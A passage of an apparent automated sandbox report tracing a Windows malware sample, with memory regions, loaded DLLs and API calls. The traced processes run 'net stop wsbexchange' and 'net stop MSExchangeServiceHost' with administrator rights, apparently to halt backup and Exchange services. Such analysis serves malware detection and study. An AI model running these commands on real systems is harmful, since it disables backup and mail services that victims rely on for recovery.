entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12058 start_va = 0x4e60000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 12059 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12060 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12061 start_va = 0x5020000 end_va = 0x511ffff entry_point = 0x0 region_type = private name = "private_0x0000000005020000" filename = "" Region: id = 12062 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 736 os_tid = 0xb3c Thread: id = 737 os_tid = 0xcd8 Process: id = "252" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x15a6f000" os_pid = "0x77c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "251" os_parent_pid = "0xc50" cmd_line = "C:\\Windows\\system32\\net1 stop wsbexchange" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12063 start_va = 0xe40000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 12064 start_va = 0xe60000 end_va = 0xe61fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 12065 start_va = 0xe70000 end_va = 0xe83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 12066 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 12067 start_va = 0xed0000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 12068 start_va = 0xf50000 end_va = 0xf53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 12069 start_va = 0xf60000 end_va = 0xf60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 12070 start_va = 0xf70000 end_va = 0xf71fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 12071 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 12072 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 12073 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12074 start_va = 0x7f120000 end_va = 0x7f142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f120000" filename = "" Region: id = 12075 start_va = 0x7f143000 end_va = 0x7f143fff entry_point = 0x0 region_type = private name = "private_0x000000007f143000" filename = "" Region: id = 12076 start_va = 0x7f14a000 end_va = 0x7f14cfff entry_point = 0x0 region_type = private name = "private_0x000000007f14a000" filename = "" Region: id = 12077 start_va = 0x7f14d000 end_va = 0x7f14dfff entry_point = 0x0 region_type = private name = "private_0x000000007f14d000" filename = "" Region: id = 12078 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12079 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12080 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12081 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12082 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12083 start_va = 0x1000000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 12084 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12085 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12086 start_va = 0x5130000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 12087 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12088 start_va = 0xe40000 end_va = 0xe4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 12089 start_va = 0xe50000 end_va = 0xe53fff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 12090 start_va = 0xf80000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 12091 start_va = 0x1070000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 12092 start_va = 0x5230000 end_va = 0x52edfff entry_point = 0x5230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12093 start_va = 0x52f0000 end_va = 0x536ffff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 12094 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 12095 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 12096 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 12097 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 12098 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 12099 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 12100 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 12101 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 12102 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 12103 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 12104 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 12105 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12106 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 12107 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12108 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12109 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 12110 start_va = 0x7f020000 end_va = 0x7f11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f020000" filename = "" Region: id = 12111 start_va = 0x7f147000 end_va = 0x7f149fff entry_point = 0x0 region_type = private name = "private_0x000000007f147000" filename = "" Region: id = 12112 start_va = 0xe60000 end_va = 0xe63fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 12113 start_va = 0xfc0000 end_va = 0xfc2fff entry_point = 0xfc0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 12114 start_va = 0x1010000 end_va = 0x1041fff entry_point = 0x1010000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 738 os_tid = 0xcbc [0140.375] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0140.375] __set_app_type (_Type=0x1) [0140.375] __p__fmode () returned 0x77ac4d6c [0140.375] __p__commode () returned 0x77ac5b1c [0140.375] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0140.375] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0140.375] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.375] GetConsoleOutputCP () returned 0x1b5 [0140.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0140.375] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.377] sprintf_s (in: _DstBuf=0xf4fef8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0140.377] setlocale (category=0, locale=".437") returned="English_United States.437" [0140.378] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0140.378] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0140.378] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wsbexchange" [0140.378] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xf4fca0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0140.378] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf4fc94 | out: Buffer=0xf4fc94*=0x5138010) returned 0x0 [0140.378] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf4fc98 | out: Buffer=0xf4fc98*=0x5138040) returned 0x0 [0140.378] __iob_func () returned 0x77ac1208 [0140.378] _fileno (_File=0x77ac1208) returned 0 [0140.379] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0140.379] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0140.379] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0140.379] _wcsicmp (_String1="config", _String2="stop") returned -16 [0140.379] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0140.379] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0140.379] _wcsicmp (_String1="file", _String2="stop") returned -13 [0140.379] _wcsicmp (_String1="files", _String2="stop") returned -13 [0140.379] _wcsicmp (_String1="group", _String2="stop") returned -12 [0140.379] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0140.379] _wcsicmp (_String1="help", _String2="stop") returned -11 [0140.379] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0140.379] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0140.379] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0140.379] _wcsicmp (_String1="session", _String2="stop") returned -15 [0140.379] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0140.379] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0140.379] _wcsicmp (_String1="share", _String2="stop") returned -12 [0140.379] _wcsicmp (_String1="start", _String2="stop") returned -14 [0140.379] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0140.379] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0140.379] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0140.379] _wcsicmp (_String1="accounts", _String2="wsbexchange") returned -22 [0140.379] _wcsicmp (_String1="computer", _String2="wsbexchange") returned -20 [0140.379] _wcsicmp (_String1="config", _String2="wsbexchange") returned -20 [0140.379] _wcsicmp (_String1="continue", _String2="wsbexchange") returned -20 [0140.379] _wcsicmp (_String1="cont", _String2="wsbexchange") returned -20 [0140.379] _wcsicmp (_String1="file", _String2="wsbexchange") returned -17 [0140.379] _wcsicmp (_String1="files", _String2="wsbexchange") returned -17 [0140.379] _wcsicmp (_String1="group", _String2="wsbexchange") returned -16 [0140.379] _wcsicmp (_String1="groups", _String2="wsbexchange") returned -16 [0140.379] _wcsicmp (_String1="help", _String2="wsbexchange") returned -15 [0140.379] _wcsicmp (_String1="helpmsg", _String2="wsbexchange") returned -15 [0140.379] _wcsicmp (_String1="localgroup", _String2="wsbexchange") returned -11 [0140.379] _wcsicmp (_String1="pause", _String2="wsbexchange") returned -7 [0140.379] _wcsicmp (_String1="session", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="sessions", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="sess", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="share", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="start", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="stats", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="statistics", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="stop", _String2="wsbexchange") returned -4 [0140.379] _wcsicmp (_String1="time", _String2="wsbexchange") returned -3 [0140.379] _wcsicmp (_String1="user", _String2="wsbexchange") returned -2 [0140.379] _wcsicmp (_String1="users", _String2="wsbexchange") returned -2 [0140.379] _wcsicmp (_String1="msg", _String2="wsbexchange") returned -10 [0140.379] _wcsicmp (_String1="messenger", _String2="wsbexchange") returned -10 [0140.379] _wcsicmp (_String1="receiver", _String2="wsbexchange") returned -5 [0140.380] _wcsicmp (_String1="rcv", _String2="wsbexchange") returned -5 [0140.380] _wcsicmp (_String1="netpopup", _String2="wsbexchange") returned -9 [0140.380] _wcsicmp (_String1="redirector", _String2="wsbexchange") returned -5 [0140.380] _wcsicmp (_String1="redir", _String2="wsbexchange") returned -5 [0140.380] _wcsicmp (_String1="rdr", _String2="wsbexchange") returned -5 [0140.380] _wcsicmp (_String1=0x1081ffc, _String2="wsbexchange") returned -4 [0140.380] _wcsicmp (_String1="work", _String2="wsbexchange") returned -4 [0140.380] _wcsicmp (_String1="wksta", _String2="wsbexchange") returned -8 [0140.380] _wcsicmp (_String1="prdr", _String2="wsbexchange") returned -7 [0140.380] _wcsicmp (_String1="devrdr", _String2="wsbexchange") returned -19 [0140.380] _wcsicmp (_String1="lanmanworkstation", _String2="wsbexchange") returned -11 [0140.380] _wcsicmp (_String1="server", _String2="wsbexchange") returned -4 [0140.380] _wcsicmp (_String1="svr", _String2="wsbexchange") returned -4 [0140.380] _wcsicmp (_String1="srv", _String2="wsbexchange") returned -4 [0140.380] _wcsicmp (_String1="lanmanserver", _String2="wsbexchange") returned -11 [0140.380] _wcsicmp (_String1="alerter", _String2="wsbexchange") returned -22 [0140.380] _wcsicmp (_String1="netlogon", _String2="wsbexchange") returned -9 [0140.380] _wcsupr (in: _String="wsbexchange" | out: _String="WSBEXCHANGE") returned="WSBEXCHANGE" [0140.380] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5132630 [0140.382] GetServiceKeyNameW (in: hSCManager=0x5132630, lpDisplayName="WSBEXCHANGE", lpServiceName=0x10a8cb0, lpcchBuffer=0xf4fc0c | out: lpServiceName="", lpcchBuffer=0xf4fc0c) returned 0 [0140.382] _wcsicmp (_String1="msg", _String2="WSBEXCHANGE") returned -10 [0140.382] _wcsicmp (_String1="messenger", _String2="WSBEXCHANGE") returned -10 [0140.382] _wcsicmp (_String1="receiver", _String2="WSBEXCHANGE") returned -5 [0140.382] _wcsicmp (_String1="rcv", _String2="WSBEXCHANGE") returned -5 [0140.382] _wcsicmp (_String1="redirector", _String2="WSBEXCHANGE") returned -5 [0140.382] _wcsicmp (_String1="redir", _String2="WSBEXCHANGE") returned -5 [0140.382] _wcsicmp (_String1="rdr", _String2="WSBEXCHANGE") returned -5 [0140.382] _wcsicmp (_String1="workstation", _String2="WSBEXCHANGE") returned -4 [0140.382] _wcsicmp (_String1="work", _String2="WSBEXCHANGE") returned -4 [0140.382] _wcsicmp (_String1="wksta", _String2="WSBEXCHANGE") returned -8 [0140.382] _wcsicmp (_String1="prdr", _String2="WSBEXCHANGE") returned -7 [0140.382] _wcsicmp (_String1="devrdr", _String2="WSBEXCHANGE") returned -19 [0140.382] _wcsicmp (_String1="lanmanworkstation", _String2="WSBEXCHANGE") returned -11 [0140.382] _wcsicmp (_String1="server", _String2="WSBEXCHANGE") returned -4 [0140.382] _wcsicmp (_String1="svr", _String2="WSBEXCHANGE") returned -4 [0140.382] _wcsicmp (_String1="srv", _String2="WSBEXCHANGE") returned -4 [0140.382] _wcsicmp (_String1="lanmanserver", _String2="WSBEXCHANGE") returned -11 [0140.382] _wcsicmp (_String1="alerter", _String2="WSBEXCHANGE") returned -22 [0140.383] _wcsicmp (_String1="netlogon", _String2="WSBEXCHANGE") returned -9 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="WORKSTATION") returned 4 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="LanmanWorkstation") returned 11 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="SERVER") returned 4 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="LanmanServer") returned 11 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="BROWSER") returned 21 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="BROWSER") returned 21 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="MESSENGER") returned 10 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="MESSENGER") returned 10 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="NETRUN") returned 9 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="NETRUN") returned 9 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="SPOOLER") returned 4 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="SPOOLER") returned 4 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="ALERTER") returned 22 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="ALERTER") returned 22 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="NETLOGON") returned 9 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="NETLOGON") returned 9 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="NETPOPUP") returned 9 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="NETPOPUP") returned 9 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="SQLSERVER") returned 4 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="SQLSERVER") returned 4 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="REPLICATOR") returned 5 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="REPLICATOR") returned 5 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="REMOTEBOOT") returned 5 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="REMOTEBOOT") returned 5 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="TIMESOURCE") returned 3 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="TIMESOURCE") returned 3 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="AFP") returned 22 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="AFP") returned 22 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="UPS") returned 2 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="UPS") returned 2 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="XACTSRV") returned -1 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="XACTSRV") returned -1 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="TCPIP") returned 3 [0140.383] _wcsicmp (_String1="WSBEXCHANGE", _String2="TCPIP") returned 3 [0140.383] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5133758 [0140.383] OpenServiceW (hSCManager=0x5133758, lpServiceName="WSBEXCHANGE", dwDesiredAccess=0x84) returned 0x0 [0140.384] GetLastError () returned 0x424 [0140.384] CloseServiceHandle (hSCObject=0x5133758) returned 1 [0140.384] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0140.384] LoadLibraryW (lpLibFileName="NETMSG") returned 0xfc0000 [0140.384] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xfc0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0140.385] GetFileType (hFile=0x40) returned 0x2 [0140.385] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf4faa8 | out: lpMode=0xf4faa8) returned 1 [0140.386] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xf4fab4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xf4fab4*=0x1e) returned 1 [0140.386] GetFileType (hFile=0x40) returned 0x2 [0140.386] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf4faa8 | out: lpMode=0xf4faa8) returned 1 [0140.386] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf4fab4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xf4fab4*=0x2) returned 1 [0140.386] _ultow (in: _Dest=0x889, _Radix=16054984 | out: _Dest=0x889) returned="2185" [0140.386] FormatMessageW (in: dwFlags=0x2800, lpSource=0xfc0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0140.386] GetFileType (hFile=0x40) returned 0x2 [0140.386] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf4fa98 | out: lpMode=0xf4fa98) returned 1 [0140.387] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xf4faa4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xf4faa4*=0x34) returned 1 [0140.387] GetFileType (hFile=0x40) returned 0x2 [0140.387] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf4fa98 | out: lpMode=0xf4fa98) returned 1 [0140.387] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf4faa4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xf4faa4*=0x2) returned 1 [0140.387] NetApiBufferFree (Buffer=0x5138010) returned 0x0 [0140.387] NetApiBufferFree (Buffer=0x5138040) returned 0x0 [0140.387] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wsbexchange" [0140.387] exit (_Code=2) Thread: id = 739 os_tid = 0xcc0 Process: id = "253" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2a5bb000" os_pid = "0xd1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeServiceHost" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12115 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 12116 start_va = 0x550000 end_va = 0x454ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 12117 start_va = 0x4550000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 12118 start_va = 0x4570000 end_va = 0x4570fff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 12119 start_va = 0x4580000 end_va = 0x4593fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004580000" filename = "" Region: id = 12120 start_va = 0x45a0000 end_va = 0x45dffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 12121 start_va = 0x45e0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 12122 start_va = 0x46e0000 end_va = 0x46e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 12123 start_va = 0x46f0000 end_va = 0x46f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046f0000" filename = "" Region: id = 12124 start_va = 0x4700000 end_va = 0x4701fff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 12125 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: 